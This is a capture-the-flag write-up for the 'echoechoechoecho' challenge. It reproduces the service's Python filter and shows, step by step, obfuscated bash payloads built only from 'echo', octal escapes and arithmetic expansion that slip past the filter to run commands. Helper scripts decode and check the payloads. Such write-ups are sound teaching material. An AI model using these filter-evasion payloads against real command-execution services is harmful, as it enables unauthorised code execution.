Insomni'hack teaser 2019 - Misc - echoechoechoecho
Reference links
Challenge description
Echo echo echo echo, good luck
nc 35.246.181.187 1337
Solution
The main idea is to bypass the filter with a carefully constructed payload.
The source code is as follows:
#!/usr/bin/env python3
from os import close
from random import choice
import re
from signal import alarm
from subprocess import check_output
from termcolor import colored
alarm(10)
colors = ["red","blue","green","yellow","magenta","cyan","white"]
# thanks http://patorjk.com/software/taag/#p=display&h=0&f=Crazy&t=echo
banner = """
_..._ .-'''-.
.-'_..._''. ' _ \\
__.....__ .' .' '.\ . / /` '. \\
.-'' '. / .' .'| . | \ '
/ .-''"'-. `. . ' < | | ' | '
/ /________\ \| | | | \ \ / /
| || | | | .'''-.`. ` ..' /
\ .-------------'. ' | |/.'''. \ '-...-'`
\ '-.____...---. \ '. .| / | |
`. .' '. `._____.-'/| | | |
`''-...... -' `-.______ / | | | |
` | '. | '.
'---' '---'
"""
def bye(s=""):
    print(s)
    print("bye")
    exit()
def check_input(payload):
    if payload == 'thisfile':
        bye(open("/bin/shell").read())
    if not all(ord(c) < 128 for c in payload):
        bye("ERROR ascii only pls")
    if re.search(r'[^();+$\\= \']', payload.replace("echo", "")):
        bye("ERROR invalid characters")
    # real echolords probably wont need more special characters than this
    if payload.count("+") > 1 or \
            payload.count("'") > 1 or \
            payload.count(")") > 1 or \
            payload.count("(") > 1 or \
            payload.count("=") > 2 or \
            payload.count(";") > 3 or \
            payload.count(" ") > 30:
        bye("ERROR Too many special chars.")
    return payload
print(colored(banner, choice(colors)))
print("Hi, what would you like to echo today? (make sure to try 'thisfile')")
payload = check_input(input())
print("And how often would you like me to echo that?")
count = max(min(int(input()), 10), 0)
payload += "|bash"*count
close(0)
result = check_output(payload, shell=True, executable="/bin/bash")
bye(result.decode())
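The payload may contain only a handful of special characters plus the word echo, and some of those special characters are limited in how many times they may appear.
First, here is how to construct ls: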
ls | bash
which is equivalent to the following
echo $'\154\163' | bash
which is equivalent to the following
echo echo \$\'\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))+$((10==10))))\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))))\'
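The two rewrites above can be checked by undoing them. This is an added example, not part of the original write-up: it evaluates the arithmetic terms the way bash would and then decodes the `$'\ooo'` octal escapes, without running a shell. `SAMPLE` rebuilds the arithmetic form shown above (15 tens plus 4 ones, then 16 tens plus 3 ones); all function names are chosen here.

```python
import re

# One bash arithmetic term: $((N)) or the comparison $((N==M)), which yields 1 or 0.
TERM = re.compile(r"\$\(\((\d+)(?:==(\d+))?\)\)")
# Two literal backslashes followed by $(( term+term+... )), as in the form above.
GROUP = re.compile(r"\\\\\$\(\(((?:\$\(\(\d+(?:==\d+)?\)\)\+?)+)\)\)")
# ANSI-C quoting that holds only octal escapes.
ANSI_C = re.compile(r"\$'((?:\\[0-7]{1,3})+)'")

def eval_sum(expr):
    """Add up a '+'-joined list of arithmetic terms."""
    total = 0
    for term in expr.split("+"):
        m = TERM.fullmatch(term)
        if m is None:
            raise ValueError("unexpected term: %r" % term)
        a, b = m.group(1), m.group(2)
        total += int(a) if b is None else int(int(a) == int(b))
    return total

def stage_one(line):
    """Text the first bash prints: sums become digits, one escape level is removed."""
    out = GROUP.sub(lambda m: "\\" + str(eval_sum(m.group(1))), line)
    out = out.replace("\\$", "$").replace("\\'", "'")
    return out[len("echo "):] if out.startswith("echo ") else out

def stage_two(cmd):
    """Replace each octal-only ANSI-C string with the characters it encodes."""
    def octal(m):
        digits = re.findall(r"\\([0-7]{1,3})", m.group(1))
        return "".join(chr(int(d, 8)) for d in digits)
    return ANSI_C.sub(octal, cmd)

# Constructed sample: the page's arithmetic form, rebuilt compactly.
TEN, ONE = "$((10))", "$((10==10))"
def page_group(tens, ones):
    return "\\\\$((" + "+".join([TEN] * tens + [ONE] * ones) + "))"
SAMPLE = "echo echo \\$\\'" + page_group(15, 4) + page_group(16, 3) + "\\'"

if __name__ == "__main__":
    first = stage_one(SAMPLE)
    print(first)
    print(stage_two(first))
```

The sums are decimal (154 and 163), but bash reads the resulting digits as octal escapes, which is how they become the two letters.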
which is equivalent to the following. When this challenge was solved, the value of $$ (the shell's process ID) was 10.
echoecho=\; echoechoecho=\( echoechoechoecho=\) echoechoechoechoecho=\+ echoechoechoechoechoecho=\'; echo echo echo \\$\\$echoechoechoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoe
cho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\$echoechoechoechoechoecho
which is equivalent to the following
echo=\=;echo echoecho$echo\\\; echoechoecho$echo\\\( echoechoechoecho$echo\\\) echoechoechoechoecho$echo\\\+ echoechoechoechoechoecho$echo\\\'\; echo echo echo \\\\$\\\\\$echoechoechoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\
$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\$echoechoechoechoechoecho
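As an added example (not part of the original write-up or the challenge code), the checks from check_input() are restated below as a function that returns the error text instead of exiting, and applied to the opening of each form shown in this write-up. The dictionary keys are labels chosen here, and the 'thisfile' branch is left out.

```python
import re

# Per-character limits copied from check_input() in the challenge source.
LIMITS = {"+": 1, "'": 1, ")": 1, "(": 1, "=": 2, ";": 3, " ": 30}

def filter_verdict(payload):
    """Return None if check_input() would accept payload, else its error text."""
    if not all(ord(c) < 128 for c in payload):
        return "ERROR ascii only pls"
    # "echo" is deleted before the character check, so letters pass only as "echo".
    if re.search(r'[^();+$\\= \']', payload.replace("echo", "")):
        return "ERROR invalid characters"
    if any(payload.count(ch) > limit for ch, limit in LIMITS.items()):
        return "ERROR Too many special chars."
    return None

# Openings of the forms shown on this page, copied from the text.
STAGES = {
    "plain": "ls",
    "octal": r"echo $'\154\163'",
    "arithmetic": "$((10==10))",
    "direct_vars": r"echoecho=\; echoechoecho=\( echoechoechoecho=\) "
                   r"echoechoechoechoecho=\+ echoechoechoechoechoecho=\';",
    "indirect_vars": r"echo=\=;echo echoecho$echo\\\; echoechoecho$echo\\\( "
                     r"echoechoechoecho$echo\\\) echoechoechoechoecho$echo\\\+ "
                     r"echoechoechoechoechoecho$echo\\\'\;",
}

def verdicts():
    """Map each stage label to the filter's decision."""
    return {name: filter_verdict(text) for name, text in STAGES.items()}

if __name__ == "__main__":
    for name, verdict in verdicts().items():
        print(name, "->", verdict or "accepted")
```

Only the last form is accepted: five direct assignments need five = characters against a limit of two, while the final form spends its two on echo=\= and reuses $echo for every later assignment.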